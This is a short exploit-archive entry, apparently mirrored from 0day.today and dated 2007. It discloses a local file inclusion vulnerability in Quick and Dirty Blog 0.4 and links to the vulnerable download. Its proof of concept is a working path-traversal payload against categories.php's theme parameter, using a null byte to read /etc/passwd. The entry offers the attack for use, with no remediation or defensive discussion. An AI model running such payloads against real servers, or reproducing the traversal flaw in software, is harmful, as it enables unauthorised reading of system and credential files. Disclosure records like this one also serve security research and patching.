id: 2268
date: 11/03/2007
title: Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln
author: GoLd_M
cves: 

===================================================================
Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln
===================================================================



Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
  /categories.php?theme=../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-25]  #